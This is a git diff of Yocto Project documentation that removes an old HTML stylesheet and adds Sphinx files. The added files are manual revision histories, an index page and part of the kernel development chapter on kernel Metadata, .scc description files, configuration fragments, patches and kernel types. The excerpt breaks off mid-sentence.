- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-.writernotes {
- color: red;
-}
-
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/documentation/dev-manual/history.rst b/documentation/dev-manual/history.rst
new file mode 100644
index 0000000000..a1716926c5
--- /dev/null
+++ b/documentation/dev-manual/history.rst
@@ -0,0 +1,79 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+ :widths: 10 15 40
+ :header-rows: 1
+
+ * - Revision
+ - Date
+ - Note
+ * - 1.1
+ - October 2011
+ - The initial document released with the Yocto Project 1.1 Release
+ * - 1.2
+ - April 2012
+ - Released with the Yocto Project 1.2 Release.
+ * - 1.3
+ - October 2012
+ - Released with the Yocto Project 1.3 Release.
+ * - 1.4
+ - April 2013
+ - Released with the Yocto Project 1.4 Release.
+ * - 1.5
+ - October 2013
+ - Released with the Yocto Project 1.5 Release.
+ * - 1.6
+ - April 2014
+ - Released with the Yocto Project 1.6 Release.
+ * - 1.7
+ - October 2014
+ - Released with the Yocto Project 1.7 Release.
+ * - 1.8
+ - April 2015
+ - Released with the Yocto Project 1.8 Release.
+ * - 2.0
+ - October 2015
+ - Released with the Yocto Project 2.0 Release.
+ * - 2.1
+ - April 2016
+ - Released with the Yocto Project 2.1 Release.
+ * - 2.2
+ - October 2016
+ - Released with the Yocto Project 2.2 Release.
+ * - 2.3
+ - May 2017
+ - Released with the Yocto Project 2.3 Release.
+ * - 2.4
+ - October 2017
+ - Released with the Yocto Project 2.4 Release.
+ * - 2.5
+ - May 2018
+ - Released with the Yocto Project 2.5 Release.
+ * - 2.6
+ - November 2018
+ - Released with the Yocto Project 2.6 Release.
+ * - 2.7
+ - May 2019
+ - Released with the Yocto Project 2.7 Release.
+ * - 3.0
+ - October 2019
+ - Released with the Yocto Project 3.0 Release.
+ * - 3.1
+ - April 2020
+ - Released with the Yocto Project 3.1 Release.
+ * - 3.1.1
+ - June 2020
+ - Released with the Yocto Project 3.1.1 Release.
+ * - 3.1.2
+ - August 2020
+ - Released with the Yocto Project 3.1.2 Release.
+ * - 3.1.3
+ - September 2020
+ - Released with the Yocto Project 3.1.3 Release.
+ * - 3.1.4
+ - November 2020
+ - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/figures/yp-how-it-works-new-diagram.png b/documentation/figures/yp-how-it-works-new-diagram.png
new file mode 100644
index 0000000000..2ce076f3c3
--- /dev/null
+++ b/documentation/figures/yp-how-it-works-new-diagram.png
Binary files differ
diff --git a/documentation/genindex.rst b/documentation/genindex.rst
new file mode 100644
index 0000000000..a4af06f656
--- /dev/null
+++ b/documentation/genindex.rst
@@ -0,0 +1,3 @@
+=====
+Index
+=====
diff --git a/documentation/index.rst b/documentation/index.rst
new file mode 100644
index 0000000000..71ed4e76f0
--- /dev/null
+++ b/documentation/index.rst
@@ -0,0 +1,52 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+.. The Yocto Project documentation master file, created by
+ sphinx-quickstart on Mon Apr 13 09:38:33 2020.
+ You can adapt this file completely to your liking, but it should at least
+ contain the root `toctree` directive.
+
+Welcome to the Yocto Project Documentation
+==========================================
+
+|
+
+.. toctree::
+ :maxdepth: 1
+ :caption: Introduction and Overview
+
+ Quick Build <brief-yoctoprojectqs/brief-yoctoprojectqs>
+ what-i-wish-id-known
+ transitioning-to-a-custom-environment
+ Yocto Project Software Overview <https://www.yoctoproject.org/software-overview/>
+ Tips and Tricks Wiki <https://wiki.yoctoproject.org/wiki/TipsAndTricks>
+
+
+.. toctree::
+ :maxdepth: 1
+ :caption: Manuals
+
+ Overview and Concepts Manual <overview-manual/overview-manual>
+ Reference Manual <ref-manual/ref-manual>
+ Board Support Package (BSP) Developer's guide <bsp-guide/bsp-guide>
+ Development Tasks Manual <dev-manual/dev-manual>
+ Linux Kernel Development Manual <kernel-dev/kernel-dev>
+ Profile and Tracing Manual <profile-manual/profile-manual>
+ Application Development and the Extensible SDK (eSDK) <sdk-manual/sdk-manual>
+ Toaster Manual <toaster-manual/toaster-manual>
+ Bitbake User Manual <https://docs.yoctoproject.org/bitbake/1.46>
+
+.. toctree::
+ :maxdepth: 1
+ :caption: 'Mega' Manual
+
+ All-in-one 'Mega' Manual <https://docs.yoctoproject.org/singleindex.html>
+
+.. toctree::
+ :maxdepth: 1
+ :caption: Manuals/Variable Index
+
+ genindex
+ Current/Previous Version Specific Manuals <releases>
+
+
+
diff --git a/documentation/kernel-dev/history.rst b/documentation/kernel-dev/history.rst
new file mode 100644
index 0000000000..c4c64ff288
--- /dev/null
+++ b/documentation/kernel-dev/history.rst
@@ -0,0 +1,70 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+ :widths: 10 15 40
+ :header-rows: 1
+
+ * - Revision
+ - Date
+ - Note
+ * - 1.4
+ - April 2013
+ - The initial document released with the Yocto Project 1.4 Release
+ * - 1.5
+ - October 2013
+ - Released with the Yocto Project 1.5 Release.
+ * - 1.6
+ - April 2014
+ - Released with the Yocto Project 1.6 Release.
+ * - 1.7
+ - October 2014
+ - Released with the Yocto Project 1.7 Release.
+ * - 1.8
+ - April 2015
+ - Released with the Yocto Project 1.8 Release.
+ * - 2.0
+ - October 2015
+ - Released with the Yocto Project 2.0 Release.
+ * - 2.1
+ - April 2016
+ - Released with the Yocto Project 2.1 Release.
+ * - 2.2
+ - October 2016
+ - Released with the Yocto Project 2.2 Release.
+ * - 2.3
+ - May 2017
+ - Released with the Yocto Project 2.3 Release.
+ * - 2.4
+ - October 2017
+ - Released with the Yocto Project 2.4 Release.
+ * - 2.5
+ - May 2018
+ - Released with the Yocto Project 2.5 Release.
+ * - 2.6
+ - November 2018
+ - Released with the Yocto Project 2.6 Release.
+ * - 2.7
+ - May 2019
+ - Released with the Yocto Project 2.7 Release.
+ * - 3.0
+ - October 2019
+ - Released with the Yocto Project 3.0 Release.
+ * - 3.1
+ - April 2020
+ - Released with the Yocto Project 3.1 Release.
+ * - 3.1.1
+ - June 2020
+ - Released with the Yocto Project 3.1.1 Release.
+ * - 3.1.2
+ - August 2020
+ - Released with the Yocto Project 3.1.2 Release.
+ * - 3.1.3
+ - September 2020
+ - Released with the Yocto Project 3.1.3 Release.
+ * - 3.1.4
+ - November 2020
+ - Released with the Yocto Project 3.1.4 Release.
diff --git a/documentation/kernel-dev/kernel-dev-advanced.rst b/documentation/kernel-dev/kernel-dev-advanced.rst
new file mode 100644
index 0000000000..444037c3a7
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-advanced.rst
@@ -0,0 +1,957 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************************************************
+Working with Advanced Metadata (``yocto-kernel-cache``)
+*******************************************************
+
+.. _kernel-dev-advanced-overview:
+
+Overview
+========
+
+In addition to supporting configuration fragments and patches, the Yocto
+Project kernel tools also support rich
+:term:`Metadata` that you can use to define
+complex policies and Board Support Package (BSP) support. The purpose of
+the Metadata and the tools that manage it is to help you manage the
+complexity of the configuration and sources used to support multiple
+BSPs and Linux kernel types.
+
+Kernel Metadata exists in many places. One area in the
+:ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+is the ``yocto-kernel-cache`` Git repository. You can find this repository
+grouped under the "Yocto Linux Kernel" heading in the
+:yocto_git:`Yocto Project Source Repositories <>`.
+
+Kernel development tools ("kern-tools") exist also in the Yocto Project
+Source Repositories under the "Yocto Linux Kernel" heading in the
+``yocto-kernel-tools`` Git repository. The recipe that builds these
+tools is ``meta/recipes-kernel/kern-tools/kern-tools-native_git.bb`` in
+the :term:`Source Directory` (e.g.
+``poky``).
+
+Using Kernel Metadata in a Recipe
+=================================
+
+As mentioned in the introduction, the Yocto Project contains kernel
+Metadata, which is located in the ``yocto-kernel-cache`` Git repository.
+This Metadata defines Board Support Packages (BSPs) that correspond to
+definitions in linux-yocto recipes for corresponding BSPs. A BSP
+consists of an aggregation of kernel policy and enabled
+hardware-specific features. The BSP can be influenced from within the
+linux-yocto recipe.
+
+.. note::
+
+ A Linux kernel recipe that contains kernel Metadata (e.g. inherits
+ from the ``linux-yocto.inc`` file) is said to be a "linux-yocto style" recipe.
+
+Every linux-yocto style recipe must define the
+:term:`KMACHINE` variable. This
+variable is typically set to the same value as the ``MACHINE`` variable,
+which is used by :term:`BitBake`.
+However, in some cases, the variable might instead refer to the
+underlying platform of the ``MACHINE``.
+
+Multiple BSPs can reuse the same ``KMACHINE`` name if they are built
+using the same BSP description. Multiple Corei7-based BSPs could share
+the same "intel-corei7-64" value for ``KMACHINE``. It is important to
+realize that ``KMACHINE`` is just for kernel mapping, while ``MACHINE``
+is the machine type within a BSP Layer. Even with this distinction,
+however, these two variables can hold the same value. See the `BSP
+Descriptions <#bsp-descriptions>`__ section for more information.
+
+Every linux-yocto style recipe must also indicate the Linux kernel
+source repository branch used to build the Linux kernel. The
+:term:`KBRANCH` variable must be set
+to indicate the branch.
+
+.. note::
+
+ You can use the ``KBRANCH`` value to define an alternate branch typically
+ with a machine override as shown here from the ``meta-yocto-bsp`` layer:
+ ::
+
+ KBRANCH_edgerouter = "standard/edgerouter"
+
+
+The linux-yocto style recipes can optionally define the following
+variables:
+
+ - :term:`KERNEL_FEATURES`
+
+ - :term:`LINUX_KERNEL_TYPE`
+
+:term:`LINUX_KERNEL_TYPE`
+defines the kernel type to be used in assembling the configuration. If
+you do not specify a ``LINUX_KERNEL_TYPE``, it defaults to "standard".
+Together with ``KMACHINE``, ``LINUX_KERNEL_TYPE`` defines the search
+arguments used by the kernel tools to find the appropriate description
+within the kernel Metadata with which to build out the sources and
+configuration. The linux-yocto recipes define "standard", "tiny", and
+"preempt-rt" kernel types. See the "`Kernel Types <#kernel-types>`__"
+section for more information on kernel types.
+
+During the build, the kern-tools search for the BSP description file
+that most closely matches the ``KMACHINE`` and ``LINUX_KERNEL_TYPE``
+variables passed in from the recipe. The tools use the first BSP
+description they find that matches both variables. If the tools cannot find
+a match, they issue a warning.
+
+The tools first search for the ``KMACHINE`` and then for the
+``LINUX_KERNEL_TYPE``. If the tools cannot find a partial match, they
+will use the sources from the ``KBRANCH`` and any configuration
+specified in the :term:`SRC_URI`.
+
+You can use the
+:term:`KERNEL_FEATURES`
+variable to include features (configuration fragments, patches, or both)
+that are not already included by the ``KMACHINE`` and
+``LINUX_KERNEL_TYPE`` variable combination. For example, to include a
+feature specified as "features/netfilter/netfilter.scc", specify:
+::
+
+ KERNEL_FEATURES += "features/netfilter/netfilter.scc"
+
+To include a
+feature called "cfg/sound.scc" just for the ``qemux86`` machine,
+specify:
+::
+
+ KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc"
+
+The value of
+the entries in ``KERNEL_FEATURES`` are dependent on their location
+within the kernel Metadata itself. The examples here are taken from the
+``yocto-kernel-cache`` repository. Each branch of this repository
+contains "features" and "cfg" subdirectories at the top-level. For more
+information, see the "`Kernel Metadata
+Syntax <#kernel-metadata-syntax>`__" section.
+
+Kernel Metadata Syntax
+======================
+
+The kernel Metadata consists of three primary types of files: ``scc``
+[1]_ description files, configuration fragments, and patches. The
+``scc`` files define variables and include or otherwise reference any of
+the three file types. The description files are used to aggregate all
+types of kernel Metadata into what ultimately describes the sources and
+the configuration required to build a Linux kernel tailored to a
+specific machine.
+
+The ``scc`` description files are used to define two fundamental types
+of kernel Metadata:
+
+- Features
+
+- Board Support Packages (BSPs)
+
+Features aggregate sources in the form of patches and configuration
+fragments into a modular reusable unit. You can use features to
+implement conceptually separate kernel Metadata descriptions such as
+pure configuration fragments, simple patches, complex features, and
+kernel types. `Kernel types <#kernel-types>`__ define general kernel
+features and policy to be reused in the BSPs.
+
+BSPs define hardware-specific features and aggregate them with kernel
+types to form the final description of what will be assembled and built.
+
+While the kernel Metadata syntax does not enforce any logical separation
+of configuration fragments, patches, features or kernel types, best
+practices dictate a logical separation of these types of Metadata. The
+following Metadata file hierarchy is recommended:
+::
+
+ base/
+ bsp/
+ cfg/
+ features/
+ ktypes/
+ patches/
+
+The ``bsp`` directory contains the `BSP
+descriptions <#bsp-descriptions>`__. The remaining directories all
+contain "features". Separating ``bsp`` from the rest of the structure
+aids conceptualizing intended usage.
+
+Use these guidelines to help place your ``scc`` description files within
+the structure:
+
+- If your file contains only configuration fragments, place the file in
+ the ``cfg`` directory.
+
+- If your file contains only source-code fixes, place the file in the
+ ``patches`` directory.
+
+- If your file encapsulates a major feature, often combining sources
+ and configurations, place the file in ``features`` directory.
+
+- If your file aggregates non-hardware configuration and patches in
+ order to define a base kernel policy or major kernel type to be
+ reused across multiple BSPs, place the file in ``ktypes`` directory.
+
+These distinctions can easily become blurred - especially as out-of-tree
+features slowly merge upstream over time. Also, remember that how the
+description files are placed is a purely logical organization and has no
+impact on the functionality of the kernel Metadata. There is no impact
+because all of ``cfg``, ``features``, ``patches``, and ``ktypes``,
+contain "features" as far as the kernel tools are concerned.
+
+Paths used in kernel Metadata files are relative to base, which is
+either
+:term:`FILESEXTRAPATHS` if
+you are creating Metadata in `recipe-space <#recipe-space-metadata>`__,
+or the top level of
+:yocto_git:`yocto-kernel-cache </cgit/cgit.cgi/yocto-kernel-cache/tree/>`
+if you are creating `Metadata outside of the
+recipe-space <#metadata-outside-the-recipe-space>`__.
+
+.. [1]
+ ``scc`` stands for Series Configuration Control, but the naming has
+ less significance in the current implementation of the tooling than
+ it had in the past. Consider ``scc`` files to be description files.
+
+Configuration
+-------------
+
+The simplest unit of kernel Metadata is the configuration-only feature.
+This feature consists of one or more Linux kernel configuration
+parameters in a configuration fragment file (``.cfg``) and a ``.scc``
+file that describes the fragment.
+
+As an example, consider the Symmetric Multi-Processing (SMP) fragment
+used with the ``linux-yocto-4.12`` kernel as defined outside of the
+recipe space (i.e. ``yocto-kernel-cache``). This Metadata consists of
+two files: ``smp.scc`` and ``smp.cfg``. You can find these files in the
+``cfg`` directory of the ``yocto-4.12`` branch in the
+``yocto-kernel-cache`` Git repository:
+::
+
+ cfg/smp.scc:
+ define KFEATURE_DESCRIPTION "Enable SMP for 32 bit builds"
+ define KFEATURE_COMPATIBILITY all
+
+ kconf hardware smp.cfg
+
+ cfg/smp.cfg:
+ CONFIG_SMP=y
+ CONFIG_SCHED_SMT=y
+ # Increase default NR_CPUS from 8 to 64 so that platform with
+ # more than 8 processors can be all activated at boot time
+ CONFIG_NR_CPUS=64
+ # The following is needed when setting NR_CPUS to something
+ # greater than 8 on x86 architectures, it should be automatically
+ # disregarded by Kconfig when using a different arch
+ CONFIG_X86_BIGSMP=y
+
+You can find general information on configuration
+fragment files in the ":ref:`creating-config-fragments`" section.
+
+Within the ``smp.scc`` file, the
+:term:`KFEATURE_DESCRIPTION`
+statement provides a short description of the fragment. Higher level
+kernel tools use this description.
+
+Also within the ``smp.scc`` file, the ``kconf`` command includes the
+actual configuration fragment in an ``.scc`` file, and the "hardware"
+keyword identifies the fragment as being hardware enabling, as opposed
+to general policy, which would use the "non-hardware" keyword. The
+distinction is made for the benefit of the configuration validation
+tools, which warn you if a hardware fragment overrides a policy set by a
+non-hardware fragment.
+
+.. note::
+
+ The description file can include multiple ``kconf`` statements, one per
+ fragment.
+
+As described in the
+":ref:`kernel-dev/kernel-dev-common:validating configuration`" section, you can
+use the following BitBake command to audit your configuration:
+::
+
+ $ bitbake linux-yocto -c kernel_configcheck -f
+
+Patches
+-------
+
+Patch descriptions are very similar to configuration fragment
+descriptions, which are described in the previous section. However,
+instead of a ``.cfg`` file, these descriptions work with source patches
+(i.e. ``.patch`` files).
+
+A typical patch includes a description file and the patch itself. As an
+example, consider the build patches used with the ``linux-yocto-4.12``
+kernel as defined outside of the recipe space (i.e.
+``yocto-kernel-cache``). This Metadata consists of several files:
+``build.scc`` and a set of ``*.patch`` files. You can find these files
+in the ``patches/build`` directory of the ``yocto-4.12`` branch in the
+``yocto-kernel-cache`` Git repository.
+
+The following listings show the ``build.scc`` file and part of the
+``modpost-mask-trivial-warnings.patch`` file:
+::
+
+ patches/build/build.scc:
+ patch arm-serialize-build-targets.patch
+ patch powerpc-serialize-image-targets.patch
+ patch kbuild-exclude-meta-directory-from-distclean-processi.patch
+
+ # applied by kgit
+ # patch kbuild-add-meta-files-to-the-ignore-li.patch
+
+ patch modpost-mask-trivial-warnings.patch
+ patch menuconfig-check-lxdiaglog.sh-Allow-specification-of.patch
+
+ patches/build/modpost-mask-trivial-warnings.patch:
+ From bd48931bc142bdd104668f3a062a1f22600aae61 Mon Sep 17 00:00:00 2001
+ From: Paul Gortmaker <paul.gortmaker@windriver.com>
+ Date: Sun, 25 Jan 2009 17:58:09 -0500
+ Subject: [PATCH] modpost: mask trivial warnings
+
+ Newer HOSTCC will complain about various stdio fcns because
+ .
+ .
+ .
+ char *dump_write = NULL, *files_source = NULL;
+ int opt;
+ --
+ 2.10.1
+
+ generated by cgit v0.10.2 at 2017-09-28 15:23:23 (GMT)
+
+The description file can
+include multiple patch statements where each statement handles a single
+patch. In the example ``build.scc`` file, five patch statements exist
+for the five patches in the directory.
+
+You can create a typical ``.patch`` file using ``diff -Nurp`` or
+``git format-patch`` commands. For information on how to create patches,
+see the ":ref:`kernel-dev/kernel-dev-common:using \`\`devtool\`\` to patch the kernel`"
+and ":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+sections.
+
+Features
+--------
+
+Features are complex kernel Metadata types that consist of configuration
+fragments, patches, and possibly other feature description files. As an
+example, consider the following generic listing:
+::
+
+ features/myfeature.scc
+ define KFEATURE_DESCRIPTION "Enable myfeature"
+
+ patch 0001-myfeature-core.patch
+ patch 0002-myfeature-interface.patch
+
+ include cfg/myfeature_dependency.scc
+ kconf non-hardware myfeature.cfg
+
+This example shows how the ``patch`` and ``kconf`` commands are used as well
+as how an additional feature description file is included with the
+``include`` command.
+
+Typically, features are less granular than configuration fragments and
+are more likely than configuration fragments and patches to be the types
+of things you want to specify in the ``KERNEL_FEATURES`` variable of the
+Linux kernel recipe. See the "`Using Kernel Metadata in a
+Recipe <#using-kernel-metadata-in-a-recipe>`__" section earlier in the
+manual.
+
+Kernel Types
+------------
+
+A kernel type defines a high-level kernel policy by aggregating
+non-hardware configuration fragments with patches you want to use when
+building a Linux kernel of a specific type (e.g. a real-time kernel).
+Syntactically, kernel types are no different than features as described
+in the "`Features <#features>`__" section. The
+:term:`LINUX_KERNEL_TYPE`
+variable in the kernel recipe selects the kernel type. For example, in
+the ``linux-yocto_4.12.bb`` kernel recipe found in
+``poky/meta/recipes-kernel/linux``, a
+:ref:`require <bitbake:require-inclusion>` directive
+includes the ``poky/meta/recipes-kernel/linux/linux-yocto.inc`` file,
+which has the following statement that defines the default kernel type:
+::
+
+ LINUX_KERNEL_TYPE ??= "standard"
+
+Another example would be the real-time kernel (i.e.
+``linux-yocto-rt_4.12.bb``). This kernel recipe directly sets the kernel
+type as follows:
+::
+
+ LINUX_KERNEL_TYPE = "preempt-rt"
+
+.. note::
+
+ You can find kernel recipes in the ``meta/recipes-kernel/linux`` directory
+ of the :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`
+ (e.g. ``poky/meta/recipes-kernel/linux/linux-yocto_4.12.bb``). See the
+ ":ref:`kernel-dev/kernel-dev-advanced:using kernel metadata in a recipe`"
+ section for more information.
+
+Three kernel types ("standard", "tiny", and "preempt-rt") are supported
+for Linux Yocto kernels:
+
+- "standard": Includes the generic Linux kernel policy of the Yocto
+ Project linux-yocto kernel recipes. This policy includes, among other
+ things, which file systems, networking options, core kernel features,
+ and debugging and tracing options are supported.
+
+- "preempt-rt": Applies the ``PREEMPT_RT`` patches and the
+ configuration options required to build a real-time Linux kernel.
+ This kernel type inherits from the "standard" kernel type.
+
+- "tiny": Defines a bare minimum configuration meant to serve as a base
+ for very small Linux kernels. The "tiny" kernel type is independent
+ from the "standard" configuration. Although the "tiny" kernel type
+ does not currently include any source changes, it might in the
+ future.
+
+For any given kernel type, the Metadata is defined by the ``.scc`` (e.g.
+``standard.scc``). Here is a partial listing for the ``standard.scc``
+file, which is found in the ``ktypes/standard`` directory of the
+``yocto-kernel-cache`` Git repository:
+::
+
+ # Include this kernel type fragment to get the standard features and
+ # configuration values.
+
+ # Note: if only the features are desired, but not the configuration
+ # then this should be included as:
+ # include ktypes/standard/standard.scc nocfg
+ # if no chained configuration is desired, include it as:
+ # include ktypes/standard/standard.scc nocfg inherit
+
+
+
+ include ktypes/base/base.scc
+ branch standard
+
+ kconf non-hardware standard.cfg
+
+ include features/kgdb/kgdb.scc
+ .
+ .
+ .
+
+ include cfg/net/ip6_nf.scc
+ include cfg/net/bridge.scc
+
+ include cfg/systemd.scc
+
+ include features/rfkill/rfkill.scc
+
+As with any ``.scc`` file, a kernel type definition can aggregate other
+``.scc`` files with ``include`` commands. These definitions can also
+directly pull in configuration fragments and patches with the ``kconf``
+and ``patch`` commands, respectively.
+
+.. note::
+
+ It is not strictly necessary to create a kernel type ``.scc``
+ file. The Board Support Package (BSP) file can implicitly define the
